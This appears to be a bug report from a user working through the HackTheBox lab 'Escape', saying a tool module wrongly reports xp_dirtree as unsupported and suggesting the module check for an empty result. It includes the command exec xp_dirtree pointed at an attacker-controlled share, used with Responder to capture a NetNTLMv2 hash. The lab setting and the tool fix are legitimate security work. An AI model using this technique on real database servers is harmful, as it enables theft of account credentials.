xp_dirtree Incorrect Result

[Zamanry]

Hi, I am working through the HackTheBox machine, Escape, and I found that xp_dirtree was incorrectly reported as not supported:

I used impacket-mssclient and DBeaver to run exec xp_dirtree '\\#.#.#.#\share' which successfully connected to my Responder instance providing a NetNTLMv2 hash. The user I am using holds public access only.

Looking at the verbose comments, my guess is that this particular box does not have a C:\. I'll continue working and see if this box has a C:\ later on. What I find interesting is that the result was an empty list [], not a SQL error. I am no expert at SQL, but could we modify the xpdirectory module to check if [] was returned and not a SQL error?

[Zamanry]

The machine does have a C:\. So permissions must be restricting the access.